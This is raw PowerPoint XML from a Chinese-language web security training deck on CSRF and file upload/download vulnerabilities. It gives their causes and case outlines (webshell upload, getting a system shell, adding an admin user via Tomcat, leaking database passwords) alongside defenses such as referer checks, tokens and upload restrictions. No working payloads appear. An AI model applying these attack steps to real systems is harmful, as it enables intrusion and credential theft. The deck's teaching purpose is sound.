              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>链接。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2276545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292662"/>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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>漏洞案例</a:t>
            </a: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攻击者发送事先构造好的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>给受害者。</a:t>
            </a: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受害者点击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>，利用自己的身份发送敏感</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>请求。</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pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014345" y="1531397"/>
            <a:ext cx="7152381" cy="2533333"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4747090" y="2645682"/>
            <a:ext cx="6428571" cy="2838095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3445951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4062651"/>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如何防御</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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敏感操作接口都需要做处理，一般有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>种方式：</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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>服务端验证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>请求的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>。</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加入随机数。</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加入临时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>，设置过期时间为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>1s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>，服务端验证有没有该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>信息。</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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1255817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p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1731532" y="202558"/>
            <a:ext cx="6884754" cy="584777"/>
            <a:chOff x="207532" y="202557"/>
            <a:chExt cx="6884754" cy="584777"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="文本框 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="394298" y="202557"/>
              <a:ext cx="758165" cy="584777"/>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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="284360"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Unicode MS" pitchFamily="34"/>
                  <a:ea typeface="Arial Unicode MS" pitchFamily="34"/>
                  <a:cs typeface="Arial Unicode MS" pitchFamily="34"/>
                </a:rPr>
                <a:t>4</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4"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r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="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致命的文件操作</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="组合 20"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="207532" y="454200"/>
              <a:ext cx="213311" cy="81492"/>
              <a:chOff x="207532" y="454200"/>
              <a:chExt cx="213311" cy="81492"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="6"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7"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8" name="组合 21"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1123569" y="454200"/>
              <a:ext cx="213302" cy="81492"/>
              <a:chOff x="1123569" y="454200"/>
              <a:chExt cx="213302" cy="81492"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="9"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10"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sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1362075" y="977421"/>
            <a:ext cx="10344149" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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任意文件上传</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>，甚至拿到系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>。</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b="1"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b="1"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ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>任意文件下载</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>敏感信息暴露，诸如：连接数据库密码，系统配置登陆密码。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="896528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2954655"/>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文件上传漏洞</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成因：</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服务端允许任意文件格式的文件上传。</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存储上传文件位置为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>可访问目录。</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服务器没有对上传文件进行重命名或者后缀更改。</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p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3103153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015663"/>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文件上传漏洞案例</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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014345" y="933518"/>
            <a:ext cx="5476190" cy="1085714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1262405" y="2157576"/>
            <a:ext cx="5476190" cy="2619048"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6972300" y="1022283"/>
            <a:ext cx="4386194"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对上传文件格式没有进行任何限制。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>将文件存储在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/upload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，可以通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>服务访问。</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没有对上传的文件进行重命名。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7124700" y="4124325"/>
            <a:ext cx="3505200" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>那么，我们可以干什么呢？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2993270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569660"/>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文件上传漏洞案例</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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>什么是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1"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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>等网页文件形式存在的一种命令执行环境，也可以将其称做为一种网页后门。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="671871" y="2046985"/>
            <a:ext cx="11029095" cy="4391601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2218997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2677656"/>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文件上传漏洞案例</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r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>获取系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a: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如果是管理员运行的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>tomcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>，直接执行添加管理员用户命令。</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indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>传木马，再运行。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="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p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1711280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2677656"/>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如何防范文件上传漏洞？</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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>服务端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>对上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>文件扩展名进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>判断。</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上传文件存放在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>不可达的目录。</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对上传文件进行重命名，并更改扩展名。（可选）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2788579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
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1838185" y="455318"/>
            <a:ext cx="8612943" cy="184665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altLang="zh-CN" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
